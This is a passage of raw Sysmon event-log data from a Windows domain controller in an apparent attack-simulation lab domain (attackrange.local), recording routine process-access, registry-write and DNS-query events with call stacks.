13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.688{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.641{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.626{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.626{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.579{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000002955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:42.860{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x0000037b) 22542200x80000000000000002961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.770{59A5CD1D-8E46-6005-1400-00000000A301}1304win-dc-495.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.685{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.677{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.668{59A5CD1D-8E44-6005-0B00-00000000A301}856ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.660{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.644{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 13241300x80000000000000002981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 13241300x80000000000000002969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 22542200x80000000000000002968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:42.653{59A5CD1D-8E56-6005-2E00-00000000A301}2464sv.symcb.com0type: 5 crl-symcprod.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 22542200x80000000000000002967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.904{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.903{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.901{59A5CD1D-8E44-6005-0B00-00000000A301}856ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.900{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.898{59A5CD1D-8E44-6005-0B00-00000000A301}856DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.870{59A5CD1D-8E46-6005-1400-00000000A301}1304attackrange.local0type: 2 win-dc-495.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 13241300x80000000000000002982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:46.641{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0xaff0d347) 13241300x80000000000000002995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 13241300x80000000000000002983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:47.798{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 22542200x80000000000000002996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:46.489{59A5CD1D-8E56-6005-2E00-00000000A301}2464s2.symcb.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000002997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:46.500{59A5CD1D-8E56-6005-2E00-00000000A301}2464sv.symcd.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000002998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:48.113{59A5CD1D-8E56-6005-2E00-00000000A301}246427.43.37.23.in-addr.arpa.0type: 12 a23-37-43-27.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x80000000000000003040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E83-6005-8800-00000000A301}43044344C:\Windows\system32\conhost.exe{59A5CD1D-8E83-6005-8A00-00000000A301}4388C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 